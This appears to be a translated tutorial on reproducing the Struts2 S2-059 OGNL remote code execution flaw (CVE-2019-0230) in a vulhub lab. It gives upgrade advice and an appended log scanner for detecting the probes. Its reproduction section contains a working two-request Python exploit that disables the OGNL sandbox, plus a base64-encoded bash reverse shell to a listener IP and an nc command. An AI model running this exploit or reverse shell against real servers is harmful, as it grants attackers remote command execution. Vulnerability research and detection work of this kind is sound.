2025-04-07 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains how to analyze the Struts2 S2-059 remote code execution vulnerability (CVE-2019-0230). The content is detailed; interested readers can refer to it, and I hope it is helpful.
In 2020, Struts2 published the S2-059 advisory, and recently S2-061 was published, whose OGNL expression evaluation is triggered in the same way as S2-059. The S2-059 fix only closed the sandbox bypass and did not remove the OGNL evaluation point, because the conditions for reaching that evaluation were considered too restrictive; S2-061 then bypassed the S2-059 sandbox again. Here I use S2-059 for testing.
1. Brief introduction
Struts2 is a powerful Java Web open source framework from the Apache Software Foundation; in essence it is a servlet. Struts2 is based on the MVC architecture and has a clear structure. It is usually used as the controller (Controller) that mediates data exchange between the model and the view, is used to build enterprise-level Java web applications, uses and extends the Java Servlet API, and encourages developers to adopt the MVC architecture. Struts2 takes the design ideas of WebWork as its core, absorbs some of the advantages of the Struts framework, and provides a cleaner web application framework for implementing the MVC design pattern.
2. Overview of the vulnerability
On August 13, 2020, Apache officially published a risk notice for a Struts2 remote code execution vulnerability, CVE-2019-0230, rated high risk with a score of 8.5.
The root cause is that the Apache Struts framework performs a second OGNL evaluation of attribute values assigned to certain tag attributes (such as id) when forced OGNL evaluation is used. If an attacker can supply external input that ends up in such a Struts2 tag attribute, a crafted OGNL expression placed there is parsed and evaluated, resulting in remote code execution.
3. Affected versions
Apache Struts2: 2.0.0 - 2.5.20
4. Environment setup
4.1 The vulnerable environment is built quickly with vulhub; the download address is:
https://github.com/vulhub/vulhub
Unzip vulhub-master.zip and copy it to kali.
cd vulhub-master/
cd struts/
cd S2-059
4.2 Use docker-compose to quickly bring up the range environment.
docker-compose build
docker-compose up -d
4.3 After startup, visit http://ip:8080/ in the browser and you can see the test page.
5. Vulnerability reproduction
5.1 When the browser requests http://ip:8080/?id=%25{2*5}, the expression 2*5 is evaluated successfully: the attribute value of the Struts2 tag is treated as an OGNL expression and parsed, which confirms the OGNL evaluation point.
5.2 Use the PoC to obtain a reverse shell; the reverse-shell payload must be base64 encoded.
bash -i >& /dev/tcp/192.168.169.130/6666 0>&1
Base64 encoding tool:
http://www.jackson-t.ca/runtime-exec-payloads.html
5.3 Run nc -lvvp 6666 on kali to listen for the connection.
5.4 Replace the payload with your own, save the following as 1.py, and run it with python.
import requests

url = "http://127.0.0.1:8080"

# First request: clear the OGNL excluded class and package lists (sandbox bypass)
data1 = {"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"}

# Second request: reset member access and execute the base64-encoded command
data2 = {"id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2OS4xMzAvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'))}"}

res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)
5.5 The reverse shell connects back to the listener.
6. Fix recommendations
6.1 Upgrade to Struts 2.5.22 or later.
6.2 Enable OGNL expression injection protection.
This concludes the analysis of the Struts2 S2-059 remote code execution vulnerability CVE-2019-0230; I hope the content above is of some help to you.
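As an added example (not part of the original article), the following Python scanner flags the forced-evaluation probes this article uses (`?id=%25{2*5}`) and S2-059-style sandbox-tampering chains in web-server access-log lines. The log lines, IP addresses and token list are constructed assumptions; note that the PoC above sends its payload in a POST body, which does not appear in access logs, so this covers only the GET query-string path.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (not from the article), modelled on the probe
# the article uses: the id parameter carries a URL-encoded %{...} OGNL expression.
SAMPLE_LOG = """\
10.0.0.5 - - [31/May/2020:10:00:01 +0000] "GET /?id=%25{2*5} HTTP/1.1" 200 512
10.0.0.5 - - [31/May/2020:10:00:02 +0000] "GET /?id=%2525%7B2*5%7D HTTP/1.1" 200 512
10.0.0.7 - - [31/May/2020:10:00:03 +0000] "GET /?id=12345 HTTP/1.1" 200 512
10.0.0.9 - - [31/May/2020:10:00:04 +0000] "GET /?id=%25{(%23context%3D%23attr['struts.valueStack'].context).(%23context.setMemberAccess(%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS))} HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Tokens seen in S2-059-style sandbox-tampering chains (the article's PoC uses
# #context, setMemberAccess, setExcludedClasses and java.lang.Runtime).
OGNL_TOKENS = ("#context", "#attr", "setMemberAccess", "setExcludedClasses",
               "setExcludedPackageNames", "java.lang.Runtime", "OgnlContext")

def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of URL encoding so %25{ and %2525%7B both end as %{."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_param(value):
    """Label one decoded parameter value, or return None when it looks benign."""
    if "%{" in value or "${" in value:
        if any(tok in value for tok in OGNL_TOKENS):
            return "ognl-sandbox-tamper"   # expression also tries to disable the sandbox
        return "ognl-expression"           # bare forced-evaluation probe such as %{2*5}
    return None

def scan_access_log(text):
    """Return (client_ip, parameter, label) for every query parameter that carries OGNL."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        query = urlsplit(m.group("target")).query
        for name, raw in parse_qsl(query, keep_blank_values=True):  # removes one encoding layer
            label = classify_param(fully_decode(raw))
            if label:
                findings.append((client_ip, name, label))
    return findings
```

Running scan_access_log(SAMPLE_LOG) yields three findings: two bare probes from 10.0.0.5 and one sandbox-tampering attempt from 10.0.0.9, while the plain numeric id is not flagged.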